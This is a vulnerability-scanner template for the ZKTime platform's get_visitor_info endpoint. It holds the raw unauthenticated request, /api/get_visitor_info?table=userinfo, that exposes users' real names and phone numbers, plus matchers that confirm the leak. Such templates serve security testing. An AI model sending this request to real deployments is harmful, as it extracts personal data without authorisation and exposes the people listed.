id: iclock-get_visitor_info-disclosure
info:
  name: ZKTime时间精细化管理平台 get_visitor_info 存在信息泄露
  author: leadlife
  severity: high
  description: 泄漏真实姓名和手机号码
  reference: 
    - https://vip.bdziyi.com/58753/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    version:
  tags: iclock,zkeco,disclosure

http:
  - raw:
      - |
        GET /api/get_visitor_info?table=userinfo HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body,'	-	-')
          - contains_all(header,'text/plain')
        condition: and